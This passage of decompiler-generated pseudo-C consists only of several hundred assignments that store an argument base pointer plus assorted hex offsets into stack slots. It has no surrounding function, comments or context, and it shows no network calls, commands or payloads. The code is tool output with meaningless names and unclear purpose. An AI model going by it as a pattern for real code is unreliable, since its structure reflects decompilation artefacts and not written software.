				 *((intOrPtr*)(_t3971 - 0x61c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x66;
				 *((intOrPtr*)(_t3971 - 0x410)) =  *((intOrPtr*)(_t3971 + 8)) + 0x71;
				 *(_t3971 - 0x1d0) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ab;
				 *(_t3971 - 0x414) =  *((intOrPtr*)(_t3971 + 8)) + 0x16b;
				 *((intOrPtr*)(_t3971 - 0x418)) =  *((intOrPtr*)(_t3971 + 8)) + 0x96;
				 *(_t3971 - 0x1d4) =  *((intOrPtr*)(_t3971 + 8)) + 0x1a6;
				 *((intOrPtr*)(_t3971 - 0x41c)) =  *((intOrPtr*)(_t3971 + 8)) + 0xf7;
				 *(_t3971 - 0xd8) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c0;
				 *((intOrPtr*)(_t3971 - 0x1d8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c0;
				 *(_t3971 - 0xdc) =  *((intOrPtr*)(_t3971 + 8)) + 0x156;
				 *(_t3971 - 0x420) =  *((intOrPtr*)(_t3971 + 8)) + 0xd2;
				 *(_t3971 - 0x1dc) =  *((intOrPtr*)(_t3971 + 8)) + 0x62;
				 *((intOrPtr*)(_t3971 - 0x1e0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x5c;
				 *((intOrPtr*)(_t3971 - 0x424)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1e0;
				 *(_t3971 - 0x44) =  *((intOrPtr*)(_t3971 + 8)) + 0x125;
				 *(_t3971 - 0x1e4) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c9;
				 *(_t3971 - 0x1e8) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ad;
				 *(_t3971 - 0x1ec) =  *((intOrPtr*)(_t3971 + 8)) + 0x11c;
				 *(_t3971 - 0x428) =  *((intOrPtr*)(_t3971 + 8)) + 0x107;
				 *((intOrPtr*)(_t3971 - 0x620)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1cf;
				 *(_t3971 - 0x1f0) =  *((intOrPtr*)(_t3971 + 8)) + 5;
				 *((intOrPtr*)(_t3971 - 0x624)) =  *((intOrPtr*)(_t3971 + 8)) + 0xb7;
				 *((intOrPtr*)(_t3971 - 0x1f4)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd4;
				 *((intOrPtr*)(_t3971 - 0x42c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x170;
				 *(_t3971 - 0x1f8) =  *((intOrPtr*)(_t3971 + 8)) + 8;
				 *(_t3971 - 0x430) =  *((intOrPtr*)(_t3971 + 8)) + 0x130;
				 *(_t3971 - 0xe0) =  *((intOrPtr*)(_t3971 + 8)) + 0x3c;
				 *((intOrPtr*)(_t3971 - 0x1fc)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c3;
				 *(_t3971 - 0x48) =  *((intOrPtr*)(_t3971 + 8)) + 0x1a3;
				 *(_t3971 - 0x200) =  *((intOrPtr*)(_t3971 + 8)) + 0xe;
				 *(_t3971 - 0xe4) =  *((intOrPtr*)(_t3971 + 8)) + 0x142;
				 *(_t3971 - 0x434) =  *((intOrPtr*)(_t3971 + 8)) + 0x15e;
				 *(_t3971 - 0xe8) =  *((intOrPtr*)(_t3971 + 8)) + 0x80;
				 *(_t3971 - 0x438) =  *((intOrPtr*)(_t3971 + 8)) + 0x2f;
				 *((intOrPtr*)(_t3971 - 0x204)) =  *((intOrPtr*)(_t3971 + 8)) + 0x124;
				 *(_t3971 - 0x208) =  *((intOrPtr*)(_t3971 + 8)) + 0x189;
				 *((intOrPtr*)(_t3971 - 0x628)) =  *((intOrPtr*)(_t3971 + 8)) + 0x68;
				 *((intOrPtr*)(_t3971 - 0x20c)) =  *((intOrPtr*)(_t3971 + 8)) + 0xbd;
				 *((intOrPtr*)(_t3971 - 0x43c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x106;
				 *(_t3971 - 0x210) =  *((intOrPtr*)(_t3971 + 8)) + 0x52;
				 *(_t3971 - 0xec) =  *((intOrPtr*)(_t3971 + 8)) + 0xd6;
				 *(_t3971 - 0x214) =  *((intOrPtr*)(_t3971 + 8)) + 0x1cb;
				 *((intOrPtr*)(_t3971 - 0x62c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x67;
				 *(_t3971 - 0xf0) =  *((intOrPtr*)(_t3971 + 8)) + 0x2b;
				 *((intOrPtr*)(_t3971 - 0x630)) =  *((intOrPtr*)(_t3971 + 8)) + 0xea;
				 *((intOrPtr*)(_t3971 - 0x440)) =  *((intOrPtr*)(_t3971 + 8)) + 0x6e;
				 *(_t3971 - 0x4c) =  *((intOrPtr*)(_t3971 + 8)) + 0xf6;
				 *(_t3971 - 0x218) =  *((intOrPtr*)(_t3971 + 8)) + 0x110;
				 *(_t3971 - 0x444) =  *((intOrPtr*)(_t3971 + 8)) + 0x184;
				 *((intOrPtr*)(_t3971 - 0x634)) =  *((intOrPtr*)(_t3971 + 8)) + 0x174;
				 *((intOrPtr*)(_t3971 - 0x448)) =  *((intOrPtr*)(_t3971 + 8)) + 0xed;
				 *(_t3971 - 0x1c) =  *((intOrPtr*)(_t3971 + 8)) + 0xb7;
				 *(_t3971 - 0x44c) =  *((intOrPtr*)(_t3971 + 8)) + 0x26;
				 *((intOrPtr*)(_t3971 - 0x450)) =  *((intOrPtr*)(_t3971 + 8)) + 0x155;
				 *(_t3971 - 0x21c) =  *((intOrPtr*)(_t3971 + 8)) + 0x126;
				 *(_t3971 - 0x50) =  *((intOrPtr*)(_t3971 + 8)) + 0x115;
				 *((intOrPtr*)(_t3971 - 0x638)) =  *((intOrPtr*)(_t3971 + 8)) + 0x147;
				 *((intOrPtr*)(_t3971 - 0x63c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x18;
				 *(_t3971 - 0x220) =  *((intOrPtr*)(_t3971 + 8)) + 0xb;
				 *((intOrPtr*)(_t3971 - 0x224)) =  *((intOrPtr*)(_t3971 + 8)) + 0xf3;
				 *(_t3971 - 0x228) =  *((intOrPtr*)(_t3971 + 8)) + 0x186;
				 *((intOrPtr*)(_t3971 - 0x454)) =  *((intOrPtr*)(_t3971 + 8)) + 0xfc;
				 *((intOrPtr*)(_t3971 - 0x458)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd3;
				 *((intOrPtr*)(_t3971 - 0x45c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c4;
				 *((intOrPtr*)(_t3971 - 0x460)) =  *((intOrPtr*)(_t3971 + 8)) + 0xa;
				 *((intOrPtr*)(_t3971 - 0x464)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1bc;
				 *((intOrPtr*)(_t3971 - 0x640)) =  *((intOrPtr*)(_t3971 + 8)) + 0x71;
				 *(_t3971 - 0xf4) =  *((intOrPtr*)(_t3971 + 8)) + 0x16d;
				 *((intOrPtr*)(_t3971 - 0x644)) =  *((intOrPtr*)(_t3971 + 8)) + 0x137;
				 *((intOrPtr*)(_t3971 - 0x648)) =  *((intOrPtr*)(_t3971 + 8)) + 0x15c;
				 *(_t3971 - 0xf8) =  *((intOrPtr*)(_t3971 + 8)) + 0x31;
				 *((intOrPtr*)(_t3971 - 0x468)) =  *((intOrPtr*)(_t3971 + 8)) + 0x5a;
				 *(_t3971 - 0x22c) =  *((intOrPtr*)(_t3971 + 8)) + 0xe5;
				 *(_t3971 - 0x230) =  *((intOrPtr*)(_t3971 + 8)) + 0x11d;
				 *((intOrPtr*)(_t3971 - 0x46c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x155;
				 *(_t3971 - 0x470) =  *((intOrPtr*)(_t3971 + 8)) + 0x10b;
				 *(_t3971 - 0x234) =  *((intOrPtr*)(_t3971 + 8)) + 0x37;
				 *((intOrPtr*)(_t3971 - 0xfc)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd2;
				 *((intOrPtr*)(_t3971 - 0x474)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1b6;
				 *(_t3971 - 0x478) =  *((intOrPtr*)(_t3971 + 8)) + 0x1f3;
				 *(_t3971 - 0x100) =  *((intOrPtr*)(_t3971 + 8)) + 0x1cb;
				 *(_t3971 - 0x47c) =  *((intOrPtr*)(_t3971 + 8)) + 0xac;
				 *(_t3971 - 0x238) =  *((intOrPtr*)(_t3971 + 8)) + 0x1e3;
				 *(_t3971 - 0x480) =  *((intOrPtr*)(_t3971 + 8)) + 0x19c;
				 *(_t3971 - 0x484) =  *((intOrPtr*)(_t3971 + 8)) + 0x90;
				 *(_t3971 - 0x488) =  *((intOrPtr*)(_t3971 + 8)) + 0x1e3;
				 *(_t3971 - 0x23c) =  *((intOrPtr*)(_t3971 + 8)) + 0xec;
				 *(_t3971 - 0x240) =  *((intOrPtr*)(_t3971 + 8)) + 0xcb;
				 *(_t3971 - 0x48c) =  *((intOrPtr*)(_t3971 + 8)) + 0x84;
				 *((intOrPtr*)(_t3971 - 0x490)) =  *((intOrPtr*)(_t3971 + 8)) + 0x106;
				 *((intOrPtr*)(_t3971 - 0x494)) =  *((intOrPtr*)(_t3971 + 8)) + 0x33;
				 *(_t3971 - 0x244) =  *((intOrPtr*)(_t3971 + 8)) + 0x3d;
				 *(_t3971 - 0x54) =  *((intOrPtr*)(_t3971 + 8)) + 0xc3;
				 *(_t3971 - 0x498) =  *((intOrPtr*)(_t3971 + 8)) + 0xcd;
				 *(_t3971 - 0x248) =  *((intOrPtr*)(_t3971 + 8)) + 0x83;
				 *((intOrPtr*)(_t3971 - 0x64c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x10b;
				 *(_t3971 - 0x58) =  *((intOrPtr*)(_t3971 + 8)) + 0xc7;
				 *(_t3971 - 0x5c) =  *((intOrPtr*)(_t3971 + 8)) + 0x1bc;
				 *(_t3971 - 0x49c) =  *((intOrPtr*)(_t3971 + 8)) + 0x7e;
				 *((intOrPtr*)(_t3971 - 0x650)) =  *((intOrPtr*)(_t3971 + 8)) + 0x129;
				 *(_t3971 - 0x24c) =  *((intOrPtr*)(_t3971 + 8)) + 0x126;
				 *(_t3971 - 0x104) =  *((intOrPtr*)(_t3971 + 8)) + 0x11f;
				 *((intOrPtr*)(_t3971 - 0x4a0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x195;
				 *(_t3971 - 0x250) =  *((intOrPtr*)(_t3971 + 8)) + 0xa9;
				 *((intOrPtr*)(_t3971 - 0x654)) =  *((intOrPtr*)(_t3971 + 8)) + 0x149;
				 *((intOrPtr*)(_t3971 - 0x4a4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1d4;
				 *(_t3971 - 0x4a8) =  *((intOrPtr*)(_t3971 + 8)) + 0xd1;
				 *((intOrPtr*)(_t3971 - 0x4ac)) =  *((intOrPtr*)(_t3971 + 8)) + 0x132;
				 *(_t3971 - 0x254) =  *((intOrPtr*)(_t3971 + 8)) + 0xf6;
				 *((intOrPtr*)(_t3971 - 0x658)) =  *((intOrPtr*)(_t3971 + 8)) + 0xc8;
				 *(_t3971 - 0x258) =  *((intOrPtr*)(_t3971 + 8)) + 0x108;
				 *(_t3971 - 0x25c) =  *((intOrPtr*)(_t3971 + 8)) + 0x19b;
				 *((intOrPtr*)(_t3971 - 0x65c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x58;
				 *(_t3971 - 0x260) =  *((intOrPtr*)(_t3971 + 8)) + 0xe2;
				 *(_t3971 - 0x264) =  *((intOrPtr*)(_t3971 + 8)) + 0x148;
				 *(_t3971 - 0x108) =  *((intOrPtr*)(_t3971 + 8)) + 0x36;
				 *(_t3971 - 0x20) =  *((intOrPtr*)(_t3971 + 8)) + 0x21;
				 *(_t3971 - 0x10c) =  *((intOrPtr*)(_t3971 + 8)) + 0x121;
				 *(_t3971 - 0x110) =  *((intOrPtr*)(_t3971 + 8)) + 0x1cb;
				 *((intOrPtr*)(_t3971 - 0x660)) =  *((intOrPtr*)(_t3971 + 8)) + 0x51;
				 *(_t3971 - 0x268) =  *((intOrPtr*)(_t3971 + 8)) + 0x195;
				 *(_t3971 - 0x114) =  *((intOrPtr*)(_t3971 + 8)) + 0x158;
				 *(_t3971 - 0x118) =  *((intOrPtr*)(_t3971 + 8)) + 0xf4;
				 *((intOrPtr*)(_t3971 - 0x11c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x173;
				 *(_t3971 - 0x60) =  *((intOrPtr*)(_t3971 + 8)) + 0x86;
				 *(_t3971 - 0x26c) =  *((intOrPtr*)(_t3971 + 8)) + 0x10f;
				 *(_t3971 - 0x270) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c2;
				 *((intOrPtr*)(_t3971 - 0x4b0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ea;
				 *((intOrPtr*)(_t3971 - 0x4b4)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd3;
				 *(_t3971 - 0x120) =  *((intOrPtr*)(_t3971 + 8)) + 0xbf;
				 *((intOrPtr*)(_t3971 - 0x4b8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x11e;
				 *(_t3971 - 0x274) =  *((intOrPtr*)(_t3971 + 8)) + 0x1bb;
				 *((intOrPtr*)(_t3971 - 0x664)) =  *((intOrPtr*)(_t3971 + 8)) + 0x3c;
				 *(_t3971 - 0x4bc) =  *((intOrPtr*)(_t3971 + 8)) + 0xd1;
				 *(_t3971 - 0x278) =  *((intOrPtr*)(_t3971 + 8)) + 0x151;
				 *(_t3971 - 0x4c0) =  *((intOrPtr*)(_t3971 + 8)) + 0x146;
				 *((intOrPtr*)(_t3971 - 0x4c4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c2;
				 *(_t3971 - 0x4c8) =  *((intOrPtr*)(_t3971 + 8)) + 0x58;
				 *(_t3971 - 0x4cc) =  *((intOrPtr*)(_t3971 + 8)) + 0x13e;
				 *((intOrPtr*)(_t3971 - 0x4d0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x141;
				 *((intOrPtr*)(_t3971 - 0x668)) =  *((intOrPtr*)(_t3971 + 8)) + 0xb3;
				 *(_t3971 - 0x27c) =  *((intOrPtr*)(_t3971 + 8)) + 0x184;
				 *((intOrPtr*)(_t3971 - 0x280)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ed;
				 *(_t3971 - 0x64) =  *((intOrPtr*)(_t3971 + 8)) + 0x11f;
				 *((intOrPtr*)(_t3971 - 0x66c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x169;
				 *((intOrPtr*)(_t3971 - 0x670)) =  *((intOrPtr*)(_t3971 + 8)) + 0x2f;
				 *(_t3971 - 0x4d4) =  *((intOrPtr*)(_t3971 + 8)) + 0x189;
				 *(_t3971 - 0x4d8) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ba;
				 *((intOrPtr*)(_t3971 - 0x4dc)) =  *((intOrPtr*)(_t3971 + 8)) + 0xcf;
				 *((intOrPtr*)(_t3971 - 0x4e0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x16;
				 *((intOrPtr*)(_t3971 - 0x284)) =  *((intOrPtr*)(_t3971 + 8)) + 0xff;
				 *(_t3971 - 0x288) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c8;
				 *(_t3971 - 0x4e4) =  *((intOrPtr*)(_t3971 + 8)) + 0x24;
				 *(_t3971 - 0x28c) =  *((intOrPtr*)(_t3971 + 8)) + 0xaf;
				 *((intOrPtr*)(_t3971 - 0x674)) =  *((intOrPtr*)(_t3971 + 8)) + 0xb3;
				 *(_t3971 - 0x290) =  *((intOrPtr*)(_t3971 + 8)) + 0x14c;
				 *((intOrPtr*)(_t3971 - 0x294)) =  *((intOrPtr*)(_t3971 + 8)) + 0x96;
				 *(_t3971 - 0x298) =  *((intOrPtr*)(_t3971 + 8)) + 0x18e;
				 *(_t3971 - 0x68) =  *((intOrPtr*)(_t3971 + 8)) + 0x173;
				 *((intOrPtr*)(_t3971 - 0x29c)) =  *((intOrPtr*)(_t3971 + 8)) + 0xfd;
				 *(_t3971 - 0x2a0) =  *((intOrPtr*)(_t3971 + 8)) + 0x166;
				 *(_t3971 - 0x2a4) =  *((intOrPtr*)(_t3971 + 8)) + 0x65;
				 *((intOrPtr*)(_t3971 - 0x2a8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x17a;
				 *(_t3971 - 0x2ac) =  *((intOrPtr*)(_t3971 + 8)) + 0xd7;
				 *((intOrPtr*)(_t3971 - 0x2b0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1f;
				 *(_t3971 - 0x2b4) =  *((intOrPtr*)(_t3971 + 8)) + 0xc;
				 *((intOrPtr*)(_t3971 - 0x2b8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ca;
				 *(_t3971 - 0x2bc) =  *((intOrPtr*)(_t3971 + 8)) + 0x4e;
				 *((intOrPtr*)(_t3971 - 0x4e8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x18c;
				 *(_t3971 - 0x124) =  *((intOrPtr*)(_t3971 + 8)) + 0x20;
				 *((intOrPtr*)(_t3971 - 0x678)) =  *((intOrPtr*)(_t3971 + 8)) + 0x10d;
				 *((intOrPtr*)(_t3971 - 0x67c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1b3;
				 *((intOrPtr*)(_t3971 - 0x680)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ba;
				 *(_t3971 - 0x2c0) =  *((intOrPtr*)(_t3971 + 8)) + 0x1b2;
				 *(_t3971 - 0x4ec) =  *((intOrPtr*)(_t3971 + 8)) + 0x68;
				 *((intOrPtr*)(_t3971 - 0x684)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1e7;
				 *((intOrPtr*)(_t3971 - 0x2c4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x9c;
				 *(_t3971 - 0x2c8) =  *((intOrPtr*)(_t3971 + 8)) + 0x97;
				 *((intOrPtr*)(_t3971 - 0x4f0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x5a;
				 *((intOrPtr*)(_t3971 - 0x688)) =  *((intOrPtr*)(_t3971 + 8)) + 0x43;
				 *((intOrPtr*)(_t3971 - 0x68c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x159;
				 *(_t3971 - 0x2cc) =  *((intOrPtr*)(_t3971 + 8)) + 0x8c;
				 *(_t3971 - 0x6c) =  *((intOrPtr*)(_t3971 + 8)) + 0x5b;
				 *((intOrPtr*)(_t3971 - 0x4f4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x9a;
				 *(_t3971 - 0x4f8) =  *((intOrPtr*)(_t3971 + 8)) + 0xcf;
				 *((intOrPtr*)(_t3971 - 0x690)) =  *((intOrPtr*)(_t3971 + 8)) + 0x5b;
				 *((intOrPtr*)(_t3971 - 0x4fc)) =  *((intOrPtr*)(_t3971 + 8)) + 4;
				 *(_t3971 - 0x500) =  *((intOrPtr*)(_t3971 + 8)) + 0x109;
				 *((intOrPtr*)(_t3971 - 0x128)) =  *((intOrPtr*)(_t3971 + 8)) + 0xf5;
				 *(_t3971 - 4) =  *((intOrPtr*)(_t3971 + 8)) + 0xc0;
				 *((intOrPtr*)(_t3971 - 0x504)) =  *((intOrPtr*)(_t3971 + 8)) + 0x4e;
				 *(_t3971 - 0x2d0) =  *((intOrPtr*)(_t3971 + 8)) + 0x6c;
				 *(_t3971 - 0x12c) =  *((intOrPtr*)(_t3971 + 8)) + 0x164;
				 *(_t3971 - 0x2d4) =  *((intOrPtr*)(_t3971 + 8)) + 0x121;
				 *(_t3971 - 0x70) =  *((intOrPtr*)(_t3971 + 8)) + 0xad;
				 *(_t3971 - 0x2d8) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c3;
				 *((intOrPtr*)(_t3971 - 0x508)) =  *((intOrPtr*)(_t3971 + 8)) + 0x6e;
				 *(_t3971 - 0x2dc) =  *((intOrPtr*)(_t3971 + 8)) + 0x8a;
				 *(_t3971 - 0x2e0) =  *((intOrPtr*)(_t3971 + 8)) + 0x120;
				 *(_t3971 - 0x130) =  *((intOrPtr*)(_t3971 + 8)) + 0x5c;
				 *(_t3971 - 0x2e4) =  *((intOrPtr*)(_t3971 + 8)) + 0x1f3;
				 *(_t3971 - 0x134) =  *((intOrPtr*)(_t3971 + 8)) + 0x186;
				 *((intOrPtr*)(_t3971 - 0x694)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c6;
				 *((intOrPtr*)(_t3971 - 0x74)) =  *((intOrPtr*)(_t3971 + 8)) + 0xc8;
				 *(_t3971 - 0x50c) =  *((intOrPtr*)(_t3971 + 8)) + 0x153;
				 *((intOrPtr*)(_t3971 - 0x510)) =  *((intOrPtr*)(_t3971 + 8)) + 0x76;
				 *(_t3971 - 0x78) =  *((intOrPtr*)(_t3971 + 8)) + 0xb6;
				 *((intOrPtr*)(_t3971 - 0x698)) =  *((intOrPtr*)(_t3971 + 8)) + 0x94;
				 *(_t3971 - 0x2e8) =  *((intOrPtr*)(_t3971 + 8)) + 0x1c7;
				 *((intOrPtr*)(_t3971 - 0x69c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x122;
				 *((intOrPtr*)(_t3971 - 0x514)) =  *((intOrPtr*)(_t3971 + 8)) + 0x13e;
				 *((intOrPtr*)(_t3971 - 0x6a0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x181;
				 *((intOrPtr*)(_t3971 - 0x6a4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x132;
				 *(_t3971 - 0x2ec) =  *((intOrPtr*)(_t3971 + 8)) + 0x179;
				 *((intOrPtr*)(_t3971 - 0x6a8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x134;
				 *(_t3971 - 0x518) =  *((intOrPtr*)(_t3971 + 8)) + 0x4d;
				 *((intOrPtr*)(_t3971 - 0x2f0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1b4;
				 *(_t3971 - 0x51c) =  *((intOrPtr*)(_t3971 + 8)) + 0x1b0;
				 *((intOrPtr*)(_t3971 - 0x520)) =  *((intOrPtr*)(_t3971 + 8)) + 0x56;
				 *((intOrPtr*)(_t3971 - 0x524)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1a1;
				 *(_t3971 - 0x2f4) =  *((intOrPtr*)(_t3971 + 8)) + 0x1a;
				 *(_t3971 - 0x2f8) =  *((intOrPtr*)(_t3971 + 8)) + 0x177;
				 *(_t3971 - 0x2fc) =  *((intOrPtr*)(_t3971 + 8)) + 0x169;
				 *((intOrPtr*)(_t3971 - 0x528)) =  *((intOrPtr*)(_t3971 + 8)) + 0x15c;
				 *((intOrPtr*)(_t3971 - 0x6ac)) =  *((intOrPtr*)(_t3971 + 8)) + 0xd9;
				 *((intOrPtr*)(_t3971 - 0x6b0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x90;
				 *((intOrPtr*)(_t3971 - 0x300)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1d4;
				 *(_t3971 - 0x52c) =  *((intOrPtr*)(_t3971 + 8)) + 0x1a5;
				 *(_t3971 - 0x138) =  *((intOrPtr*)(_t3971 + 8)) + 0xb8;
				 *((intOrPtr*)(_t3971 - 0x530)) =  *((intOrPtr*)(_t3971 + 8)) + 0xbc;
				 *((intOrPtr*)(_t3971 - 0x534)) =  *((intOrPtr*)(_t3971 + 8)) + 0xfe;
				 *((intOrPtr*)(_t3971 - 0x6b4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1d8;
				 *(_t3971 - 0x13c) =  *((intOrPtr*)(_t3971 + 8)) + 0xe3;
				 *(_t3971 - 0x538) =  *((intOrPtr*)(_t3971 + 8)) + 0x14;
				 *((intOrPtr*)(_t3971 - 0x6b8)) =  *((intOrPtr*)(_t3971 + 8)) + 0xfc;
				 *(_t3971 - 0x304) =  *((intOrPtr*)(_t3971 + 8)) + 0x148;
				 *(_t3971 - 0x140) =  *((intOrPtr*)(_t3971 + 8)) + 0x186;
				 *(_t3971 - 0x144) =  *((intOrPtr*)(_t3971 + 8)) + 0x153;
				 *(_t3971 - 0x308) =  *((intOrPtr*)(_t3971 + 8)) + 0xdb;
				 *(_t3971 - 0x30c) =  *((intOrPtr*)(_t3971 + 8)) + 0x1e5;
				 *(_t3971 - 0x310) =  *((intOrPtr*)(_t3971 + 8)) + 0x12c;
				 *((intOrPtr*)(_t3971 - 0x6bc)) =  *((intOrPtr*)(_t3971 + 8)) + 0xdc;
				 *((intOrPtr*)(_t3971 - 0x53c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x25;
				 *((intOrPtr*)(_t3971 - 0x314)) =  *((intOrPtr*)(_t3971 + 8)) + 0x1dc;
				 *(_t3971 - 0x318) =  *((intOrPtr*)(_t3971 + 8)) + 0xcc;
				 *((intOrPtr*)(_t3971 - 0x540)) =  *((intOrPtr*)(_t3971 + 8)) + 0xa2;
				 *((intOrPtr*)(_t3971 - 0x6c0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x182;
				 *(_t3971 - 0x148) =  *((intOrPtr*)(_t3971 + 8)) + 0x8c;
				 *((intOrPtr*)(_t3971 - 0x6c4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x69;
				 *(_t3971 - 0x544) =  *((intOrPtr*)(_t3971 + 8)) + 0x4e;
				 *(_t3971 - 0x14c) =  *((intOrPtr*)(_t3971 + 8)) + 0x162;
				 *((intOrPtr*)(_t3971 - 0x31c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x10c;
				 *((intOrPtr*)(_t3971 - 0x7c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x9e;
				 *(_t3971 - 0x150) =  *((intOrPtr*)(_t3971 + 8)) + 0x19;
				 *((intOrPtr*)(_t3971 - 0x154)) =  *((intOrPtr*)(_t3971 + 8)) + 0x91;
				 *(_t3971 - 0x158) =  *((intOrPtr*)(_t3971 + 8)) + 0x134;
				 *(_t3971 - 0x80) =  *((intOrPtr*)(_t3971 + 8)) + 0x35;
				 *((intOrPtr*)(_t3971 - 0x548)) =  *((intOrPtr*)(_t3971 + 8)) + 0x16;
				 *((intOrPtr*)(_t3971 - 0x54c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x77;
				 *((intOrPtr*)(_t3971 - 0x550)) =  *((intOrPtr*)(_t3971 + 8)) + 0x164;
				 *((intOrPtr*)(_t3971 - 0x6c8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x37;
				 *((intOrPtr*)(_t3971 - 0x554)) =  *((intOrPtr*)(_t3971 + 8)) + 0x15a;
				 *((intOrPtr*)(_t3971 - 0x6cc)) =  *((intOrPtr*)(_t3971 + 8)) + 0xc1;
				 *(_t3971 - 0x558) =  *((intOrPtr*)(_t3971 + 8)) + 0x1da;
				 *(_t3971 - 0x84) =  *((intOrPtr*)(_t3971 + 8)) + 0x158;
				 *((intOrPtr*)(_t3971 - 0x6d0)) =  *((intOrPtr*)(_t3971 + 8)) + 0xfb;
				 *((intOrPtr*)(_t3971 - 0x55c)) =  *((intOrPtr*)(_t3971 + 8)) + 0x67;
				 *((intOrPtr*)(_t3971 - 0x6d4)) =  *((intOrPtr*)(_t3971 + 8)) + 0xe4;
				 *(_t3971 - 0x15c) =  *((intOrPtr*)(_t3971 + 8)) + 0x127;
				 *((intOrPtr*)(_t3971 - 0x6d8)) =  *((intOrPtr*)(_t3971 + 8)) + 0x15e;
				 *((intOrPtr*)(_t3971 - 0x320)) =  *((intOrPtr*)(_t3971 + 8)) + 0x72;
				 *(_t3971 - 0x560) =  *((intOrPtr*)(_t3971 + 8)) + 0x1a;
				 *((intOrPtr*)(_t3971 - 0x324)) =  *((intOrPtr*)(_t3971 + 8)) + 0x69;
				 *((intOrPtr*)(_t3971 - 0x328)) =  *((intOrPtr*)(_t3971 + 8)) + 0xa4;
				 *((intOrPtr*)(_t3971 - 0x32c)) =  *((intOrPtr*)(_t3971 + 8)) + 0xc5;
				 *((intOrPtr*)(_t3971 - 0x6dc)) =  *((intOrPtr*)(_t3971 + 8)) + 0x99;
				 *((intOrPtr*)(_t3971 - 0x6e0)) =  *((intOrPtr*)(_t3971 + 8)) + 0x62;
				 *(_t3971 - 0x160) =  *((intOrPtr*)(_t3971 + 8)) + 7;
				 *(_t3971 - 0x564) =  *((intOrPtr*)(_t3971 + 8)) + 0xf8;
				 *(_t3971 - 0x88) =  *((intOrPtr*)(_t3971 + 8)) + 0x64;
				 *((intOrPtr*)(_t3971 - 0x568)) =  *((intOrPtr*)(_t3971 + 8)) + 0xa4;
				 *(_t3971 - 0x56c) =  *((intOrPtr*)(_t3971 + 8)) + 0x130;
				 *(_t3971 - 0x8c) =  *((intOrPtr*)(_t3971 + 8)) + 0x1ec;
				 *((intOrPtr*)(_t3971 - 0x330)) =  *((intOrPtr*)(_t3971 + 8)) + 0x9a;
				 *(_t3971 - 0x90) =  *((intOrPtr*)(_t3971 + 8)) + 0xb3;
				 *(_t3971 - 0x334) =  *((intOrPtr*)(_t3971 + 8)) + 0x150;
				 *(_t3971 - 0x164) =  *((intOrPtr*)(_t3971 + 8)) + 0x10d;
				 *(_t3971 - 0x338) =  *((intOrPtr*)(_t3971 + 8)) + 0x1b9;
				 *((intOrPtr*)(_t3971 - 0x570)) =  *((intOrPtr*)(_t3971 + 8)) + 0x29;
				 *(_t3971 - 0x33c) =  *((intOrPtr*)(_t3971 + 8)) + 0x13f;
				 *(_t3971 - 0x94) =  *((intOrPtr*)(_t3971 + 8)) + 0x1b1;
				 *((intOrPtr*)(_t3971 - 0x340)) =  *((intOrPtr*)(_t3971 + 8)) + 0x71;
				 *((intOrPtr*)(_t3971 - 0x6e4)) =  *((intOrPtr*)(_t3971 + 8)) + 0x2a;
				 *(_t3971 - 0x574) =  *((intOrPtr*)(_t3971 + 8)) + 0xdc;
